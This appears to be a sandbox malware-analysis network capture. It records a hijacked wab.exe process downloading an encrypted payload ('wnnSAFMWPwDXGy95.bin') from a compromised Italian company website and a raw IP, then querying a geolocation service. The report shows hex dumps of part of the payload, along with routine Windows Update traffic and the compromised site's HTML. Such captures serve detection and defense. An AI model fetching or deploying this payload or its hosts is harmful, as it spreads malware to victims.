                                                                              May 2, 2024 17:21:54.579684973 CEST1289INData Raw: 72 74 79 3d 22 6f 67 3a 75 70 64 61 74 65 64 5f 74 69 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 31 37 31 34 36 36 33 33 31 34 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 72 6f 62 6f 74 73 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f
                                                                              Data Ascii: rty="og:updated_time" content=1714663314 /><meta name=robots content="index, follow" /><link rel=icon type="image/x-icon" href="/assets/theme/icons/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/assets/theme/icons/favicon.
                                                                              May 2, 2024 17:21:54.579696894 CEST1289INData Raw: 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 77 69 64 65 33 31 30 78 31 35 30 6c 6f 67 6f 20 63 6f 6e 74 65 6e 74 3d 22 2f 61 73 73 65 74 73 2f 74 68 65 6d 65 2f 69 63 6f 6e 73 2f 69 63 6f
                                                                              Data Ascii: 0.png" /><meta name=msapplication-wide310x150logo content="/assets/theme/icons/icon-ms-310-150.png" /><meta name=msapplication-square310x310logo content="/assets/theme/icons/icon-ms-310.png" /><meta name=msapplication-TileColor content="#FFFFF
                                                                              May 2, 2024 17:21:54.579710007 CEST1289INData Raw: 65 78 74 2d 72 69 67 68 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 68 65 61 64 65 72 2d 73 6f 63 69 61 6c 3e 3c 61 20 63 6c 61 73 73 3d 73 6f 63 69 61 6c 2d 66 61 63 65 62 6f 6f 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63
                                                                              Data Ascii: ext-right"><div class=header-social><a class=social-facebook href="https://www.facebook.com/duelvalenzasrl" title="Follow us on Facebook" target=_blank><i class="fa fa-facebook"></i></a><a class=social-twitter href="https://twitter.com/duelval
                                                                              May 2, 2024 17:21:54.579716921 CEST1289INData Raw: 6e 64 69 6e 67 73 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 64 69 61 6d 6f 6e 64 22 3e 3c 2f 69 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 64 72 6f 70 62 74 6e 3e 46 69 6e 64 69 6e 67 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                                              Data Ascii: ndings><i class="fa fa-diamond"></i><span class=dropbtn>Findings</span></a></li><li><a href="http://www.duelvalenza.it/en/services/no-title-2/" title=Casting><i class="fa fa-cube"></i><span class=dropbtn>Casting</span></a></li><li><a href="htt
                                                                              May 2, 2024 17:21:54.579766989 CEST1289INData Raw: 65 49 6e 44 6f 77 6e 22 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 65 6e 2f 22 20 74 69 74 6c 65 3d 22 22 3e 48 6f 6d 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61
                                                                              Data Ascii: eInDown"><li><a href="http://www.duelvalenza.it/en/" title="">Home</a></li><li class=active><span>Page not found</span></li></ul></div><div class=section-sep-bw></div></section><section class=section-content><div class=container><div class=tex
                                                                              May 2, 2024 17:21:54.579791069 CEST1289INData Raw: 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 22 3e 3c 2f 69 3e 3c 73 74 72 6f 6e 67 3e 45 2d 6d 61 69 6c 3a 3c 2f 73 74 72 6f 6e 67 3e 3c 62 72 20 2f 3e 3c 61 20 68 72 65 66 3d 22 6d 61 69
                                                                              Data Ascii: ></li><li><i class="fa fa-envelope"></i><strong>E-mail:</strong><br /><a href="mailto:&#105;&#110;&#102;&#111;&#64;&#100;&#117;&#101;&#108;&#118;&#97;&#108;&#101;&#110;&#122;&#97;&#46;&#105;&#116;">&#105;&#110;&#102;&#111;&#64;&#100;&#117;&#10
                                                                              May 2, 2024 17:21:54.579857111 CEST1289INData Raw: 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 73 65 63 74 69 6f 6e 3e 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 66 6f 6f 74 65 72 2d 63 6f 70 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63
                                                                              Data Ascii: </div></div></div></section><section class=footer-copy><div class=container><div class=row><div class=col-sm-9><p> Duel srl. 2024. All Rights Reserved |<a data-box data-box-ajax="http://www.duelvalenza.it/en/company-informations/?content=1
                                                                              May 2, 2024 17:21:54.579869986 CEST1289INData Raw: 64 69 76 20 63 6c 61 73 73 3d 62 65 65 2d 6f 66 66 63 61 6e 76 61 73 3e 3c 6e 61 76 20 64 61 74 61 2d 6f 66 66 63 61 6e 76 61 73 2d 62 61 72 3d 6d 61 69 6e 20 63 6c 61 73 73 3d 62 65 65 2d 6f 66 66 63 61 6e 76 61 73 2d 62 61 72 3e 3c 64 69 76 20
                                                                              Data Ascii: div class=bee-offcanvas><nav data-offcanvas-bar=main class=bee-offcanvas-bar><div class=bee-offcanvas-content><ul class="nav navbar-nav"><li><a href="http://www.duelvalenza.it/en/" title="">Home</a></li><li><a href="http://www.duelvalenza.it/e
                                                                              May 2, 2024 17:21:54.579886913 CEST1289INData Raw: 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 22 20 74 69 74 6c 65 3d 4e 65 77 73 3e 4e 65 77 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76
                                                                              Data Ascii: /li></ul></li><li><a href="" title=News>News</a></li><li><a href="http://www.duelvalenza.it/en/contacts/" title=Contacts>Contact us</a></li></ul></div></nav></div><div id=scripts><script type="text/javascript" src="//cdn.ene.si/jquery/1.11.1/j
                                                                              May 2, 2024 17:21:54.764233112 CEST191INData Raw: 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 73 73 65 74 73 2f 6c 69 62 2f 62 65 65 72 73 2f 62 65 65 72 73 2e 6d 69 6e 2e 6a 73 22 3e
                                                                              Data Ascii: .js"></script><script type="text/javascript" src="/assets/lib/beers/beers.min.js"></script><script type="text/javascript" src="/assets/theme/js/global.js"></script></div></body></html>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.44974987.121.105.163808872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 2, 2024 17:21:55.046840906 CEST179OUTGET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: 87.121.105.163
                                                                              Cache-Control: no-cache
                                                                              May 2, 2024 17:21:55.215075970 CEST1289INHTTP/1.1 200 OK
                                                                              Date: Thu, 02 May 2024 15:21:55 GMT
                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                              Last-Modified: Tue, 30 Apr 2024 00:33:24 GMT
                                                                              ETag: "78c40-617458488bd00"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 494656
                                                                              Content-Type: application/octet-stream
                                                                              Data Raw: d4 96 b1 5a 3b a9 6d 05 ba 72 ad d0 8b 51 db 10 b3 55 f0 9a 95 90 68 4e a0 98 16 79 a7 0b e8 74 92 b6 e8 76 8b 42 59 44 1a 98 d4 9e 44 95 cd e7 09 ba e7 af 52 e2 6b d9 ad c7 c2 43 67 0f 40 bc 11 d4 ba 3f 90 cc e7 f9 7a 90 a0 ef ca 45 8c 41 7d d4 f8 82 bb 46 37 14 d3 6e 2e 05 8f 02 ea 4d 58 02 69 9b 46 96 dd d2 18 43 67 54 29 b6 48 b1 b8 ae 10 d5 41 bf 46 26 84 34 ab fd a8 35 e7 93 15 a9 06 1a 35 94 08 36 d3 da 57 a7 f9 a3 64 08 b6 46 1d 01 58 66 59 e9 95 60 9d 7e 65 b1 6c 15 c4 cd 1d e6 21 4e 53 e1 11 d2 2b 95 ce 78 d8 3d b5 c3 8f 33 e0 ba 25 8c f5 a5 84 3d df be cc 03 8d f3 59 6c 59 d4 7f 0b 18 04 d4 cf 7a 48 7f f5 7f fb 54 23 22 6f 99 66 9f 59 3d ae dc 09 ca 48 ed 26 03 30 ed 79 82 b4 aa d4 58 3d e5 91 81 d8 e5 b5 f8 4e 95 e7 69 36 ec 90 e0 39 5e b7 62 a4 e2 ba 83 aa 9d 06 1e 38 74 96 e4 4c 26 89 6b 14 d8 8f 9f 1c 04 23 10 6b 20 46 30 8e a0 ee 4e 88 1d ec d8 46 20 fc 76 e9 3e c8 b4 29 cc e3 85 0e 58 0b 08 53 89 32 a0 48 8a 81 06 1e db 71 f7 9c 4c 6b ce 4d fd 3d 3d db 79 41 10 81 ed 33 a7 11 1d af [TRUNCATED]
                                                                              Data Ascii: Z;mrQUhNytvBYDDRkCg@?zEA}F7n.MXiFCgT)HAF&4556WdFXfY`~el!NS+x=3%=YlYzHT#"ofY=H&0yX=Ni69^b8tL&k#k F0NF v>)XS2HqLkM==yA3&=Hm}4S$y!}vs4 Sg&\RL;P1Tn7z)"].VcTHg0F'akew]~/=11lb[4 SIW^h}L4GrISL!{4}58]teE>K/W%5_\`E6^w_>#_mp?!EJaF,h)I&XP"uo~xZtSCIqFn"P) so]#%P_QiN=fKw,"cVDMVQ:}@whfUWa"pE^z`AifY+yUyS2;itZo;&R8vU|^Z. EcOQWTM\C5|:a'OU3|g`fnAE1hmXO(kj;}X_MM-)YZP^T5'Q\[+NFU5FH]xgguk5(ZewX"n [TRUNCATED]
                                                                              May 2, 2024 17:21:55.215091944 CEST1289INData Raw: 67 ef ec c3 f5 13 9a 9e 74 f7 12 97 a3 40 76 e8 c5 67 8e 87 2b a5 6a 58 83 01 6d 06 88 26 bf 71 15 48 b2 89 27 87 33 26 db 23 e1 56 b0 28 74 9b 27 b7 6e c9 3e 90 72 86 94 ae 8f 04 3e 39 92 6b 85 34 0c d1 f2 4b ca 49 f6 71 f0 2d eb 10 87 47 0b 4d
                                                                              Data Ascii: gt@vg+jXm&qH'3&#V(t'n>r>9k4KIq-GMa!bK?Od(4Pu|31Af<`n-}:*IOX.QHdh4<{{HJiPpE%7};1S,BymjC-:Y:
                                                                              May 2, 2024 17:21:55.215205908 CEST1289INData Raw: e2 11 a5 7a be 25 57 d4 f9 5f 89 59 b9 08 97 26 e8 8b 7d b2 77 51 31 c4 b9 d3 8c e6 2a 20 e2 e7 35 9e 33 65 e2 5a 3c 8d b3 81 cb 01 bf 5a 16 d5 8f 44 b7 2e 59 d8 c6 3a 6d 09 f0 e4 d3 d3 62 8e 31 4d 04 5b 31 b1 fa 87 bc 66 56 e8 e0 5f 98 fb f2 29
                                                                              Data Ascii: z%W_Y&}wQ1* 53eZ<ZD.Y:mb1M[1fV_)=-V>T]2wcv+ smh5_u{F-,=D9DQcWF[]_P6az`4:7DdAOE>Y~:5vKnfAi){?tQ0q6ZRRKxqLv
                                                                              May 2, 2024 17:21:55.215218067 CEST1289INData Raw: 21 48 dd d0 a1 83 26 f3 f0 83 5f 4a 5a 12 5f 87 fb 20 82 af a5 2b 36 0a 3c b1 00 11 01 94 17 1d 2e b6 09 00 d5 b3 82 e5 20 bc b1 db f1 40 25 53 55 8e ba 7e 7a 0c a2 80 52 0b f6 ab 7e b0 bd 69 a2 e8 99 05 18 1d be 00 df 17 51 dc 3f 41 c7 66 40 36
                                                                              Data Ascii: !H&_JZ_ +6<. @%SU~zR~iQ?Af@6f*EbNAU~!I$smN{f4Wg_YnCC:R_ZejR~2E:jB0-zaMa`!LGo\*%8|f1C
                                                                              May 2, 2024 17:21:55.215229988 CEST1289INData Raw: a8 e1 c9 02 f1 40 f3 a3 0a a1 c5 cd fb 29 59 e7 8c 30 50 1d c5 69 5d 92 c5 bd 2c 36 27 51 36 5b cf c3 10 6b 18 e3 4e 85 cb de 4e 5f 66 cd 41 40 a2 d6 17 b3 83 b1 3d 74 a5 e2 f4 19 f1 64 75 6b be 79 c0 74 58 05 65 27 23 5a 15 c5 b6 58 f9 72 0f 9f
                                                                              Data Ascii: @)Y0Pi],6'Q6[kNN_fA@=tdukytXe'#ZXryi-Uh_{6y?E&c4+ZqCCa3&#V;"#&Q(I4a76:>x3GSs$wOdLT!?%(x&
                                                                              May 2, 2024 17:21:55.215240955 CEST1289INData Raw: d6 3c 95 c5 5c 47 2f 6d c5 cc 87 3b 22 41 a8 a8 42 bb 83 0e 9a be be 0a b1 53 94 d7 62 3f 64 e9 bb 11 5d ec b7 7d 10 22 ae fe b0 48 25 8c d6 bb aa ec fc cb 1b ca b9 fb db 16 70 be 6a 66 79 fd 6e de 17 02 15 67 bc e4 f0 3d 02 9e f6 e2 16 c6 31 0c
                                                                              Data Ascii: <\G/m;"ABSb?d]}"H%pjfyng=1lWFOOH"?C}mMR(&==0wdfdR:q*w#OA8w/6S&*m[QK>ejax_f~YT$t84+%ak))iw
                                                                              May 2, 2024 17:21:55.215358019 CEST1289INData Raw: 0f b4 24 ae a4 eb ad 03 d4 2b 6d 0e 0c d0 71 9b 90 57 ac 7d 81 6e d7 34 3a 87 de 93 23 51 4b 8b 3e 24 e6 63 f6 82 0e 0a c9 fa 9a 45 54 f7 4a 1b 71 54 75 50 1d 2e 48 dc d3 15 cd a1 27 d3 8d cf 13 9f a7 7a 08 c3 22 6d 91 19 d5 b2 ef 0b 59 c6 6b 70
                                                                              Data Ascii: $+mqW}n4:#QK>$cETJqTuP.H'z"mYkphvfiE?726{.D]8po1`k$:@#wLI7I/]O&WU2T!T|wfZ3Q=x~xY UHSEHY"u|e
                                                                              May 2, 2024 17:21:55.215394020 CEST1289INData Raw: 2f be d1 3e dc f8 f8 a9 15 eb 80 90 f8 fa bc 2a ba a1 72 89 3d d6 b8 52 46 52 4e 6c 12 91 d0 a3 49 8b 99 02 6f a7 98 df 28 06 72 36 86 da 59 97 07 a6 04 94 89 bb 23 61 57 d8 ea 45 96 8a 94 1b 9a 91 85 4d 86 b2 81 fa e7 5c 1a f7 f5 a6 95 11 1f ed
                                                                              Data Ascii: />*r=RFRNlIo(r6Y#aWEM\a_Xc7fnmXO)2@Sl9!L4r\7mrhJ>`0.j>2lS[Ps+/.(M8J`;
                                                                              May 2, 2024 17:21:55.215446949 CEST1289INData Raw: 1e 6e 2e 05 df 89 24 a5 e7 f4 96 64 ad a9 50 97 08 13 ea 19 3d 5e ca b1 b8 ae 40 58 0c af ae 4f 84 34 ab ad 35 71 ef c3 96 fb b0 fc 54 20 01 fb a2 ef 13 17 bf 4c 60 88 ae c4 c2 8e 7a 84 73 93 1c 41 bd 1d 04 8f 89 b4 58 35 7c 83 01 b7 e0 d1 ba 5e
                                                                              Data Ascii: n.$dP=^@XO45qT L`zsAX5|^w7"yn=jq:=&jI\hH>(RROP2-06CbapiQI;4_GoN&r5CdTM(KlwPp$&Ml9$
                                                                              May 2, 2024 17:21:55.215461969 CEST1289INData Raw: 2c c0 f6 f3 b4 07 c7 d9 99 b6 0b 4c 30 5e cb a8 58 97 18 bd cc f9 dc 2b fe 1c 40 5e 5d bc d4 8f 8c cb 1c 2b 38 cc a9 a5 83 08 eb 32 9b 05 1e 04 bc 04 51 8b 29 24 a6 43 a6 3d 43 c1 d1 d8 53 40 05 b6 7c eb 6c 4a dc aa 9c 81 7e 1b dc d1 7d 0c e0 11
                                                                              Data Ascii: ,L0^X+@^]+82Q)$C=CS@|lJ~}rRv&AN#:lGE-Z9gq|=~Ul\p!qoX#VmMl,mzOB.+-DZk3XRiv4/o$Zm_
                                                                              May 2, 2024 17:21:55.381963968 CEST1289INData Raw: a9 38 5e 61 d6 37 c6 73 e8 a2 d1 15 77 4e ed 5a a4 ae d6 1d ef 14 fd cd c3 67 af e3 5c 54 49 22 92 26 4d 69 53 aa c2 99 48 d8 94 b4 7c 54 5d 62 dd e9 9f 1b 6f dd ac 11 2d 6d 77 e5 b2 dd 1d 1e c1 7e cf 32 28 51 88 a5 e1 b6 f1 02 49 83 35 b4 b1 76
                                                                              Data Ascii: 8^a7swNZg\TI"&MiSH|T]bo-mw~2(QI5vE ry~j1g'MATRLJ9zl\t}VgzaPf`LRRPPLvH[S$ zz_!-R](v)Q[e^~fs>}}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449754178.237.33.50808872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 2, 2024 17:22:04.237040043 CEST71OUTGET /json.gp HTTP/1.1
                                                                              Host: geoplugin.net
                                                                              Cache-Control: no-cache
                                                                              May 2, 2024 17:22:04.409076929 CEST1173INHTTP/1.1 200 OK
                                                                              date: Thu, 02 May 2024 15:22:04 GMT
                                                                              server: Apache
                                                                              content-length: 965
                                                                              content-type: application/json; charset=utf-8
                                                                              cache-control: public, max-age=300
                                                                              access-control-allow-origin: *
                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                              Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.44973713.85.23.86443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-02 15:21:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-05-02 15:21:18 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                              MS-CorrelationId: 319179a4-5a2d-4abe-a0ea-26fbc04063c9
                                                                              MS-RequestId: 9d3c1b22-f518-4d48-9df1-05a39983dc31
                                                                              MS-CV: OAvv/0tL9kilbFWb.0
                                                                              X-Microsoft-SLSClientCache: 2880
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 02 May 2024 15:21:17 GMT
                                                                              Connection: close
                                                                              Content-Length: 24490
                                                                              2024-05-02 15:21:18 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                              2024-05-02 15:21:18 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.44974746.254.34.124438872C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-02 15:21:53 UTC179OUTGET /wnnSAFMWPwDXGy95.bin HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                              Host: duelvalenza.it
                                                                              Cache-Control: no-cache
                                                                              2024-05-02 15:21:53 UTC299INHTTP/1.1 301 Moved Permanently
                                                                              Date: Thu, 02 May 2024 15:21:53 GMT
                                                                              Server: Apache
                                                                              Location: http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin
                                                                              Cache-Control: max-age=1800
                                                                              Expires: Thu, 02 May 2024 15:51:53 GMT
                                                                              Content-Length: 254
                                                                              Connection: close
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              2024-05-02 15:21:53 UTC254INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 75 65 6c 76 61 6c 65 6e 7a 61 2e 69 74 2f 77 6e 6e 53 41 46 4d 57 50 77 44 58 47 79 39 35 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.duelvalenza.it/wnnSAFMWPwDXGy95.bin">here</a>.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.44975013.85.23.86443
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-02 15:21:58 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=31Uvm8ZtBDtgrS+&MD=Cvo7KdgH HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Accept: */*
                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                              Host: slscr.update.microsoft.com
                                                                              2024-05-02 15:21:59 UTC560INHTTP/1.1 200 OK
                                                                              Cache-Control: no-cache
                                                                              Pragma: no-cache
                                                                              Content-Type: application/octet-stream
                                                                              Expires: -1
                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                              ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                              MS-CorrelationId: 9e9e4730-201d-4ff0-b5c6-e11f21e13623
                                                                              MS-RequestId: f3f7051d-adca-4c83-a73d-81f72731c959
                                                                              MS-CV: HrpLe7m+ZkilhptC.0
                                                                              X-Microsoft-SLSClientCache: 2160
                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                              X-Content-Type-Options: nosniff
                                                                              Date: Thu, 02 May 2024 15:21:58 GMT
                                                                              Connection: close
                                                                              Content-Length: 25457
                                                                              2024-05-02 15:21:59 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
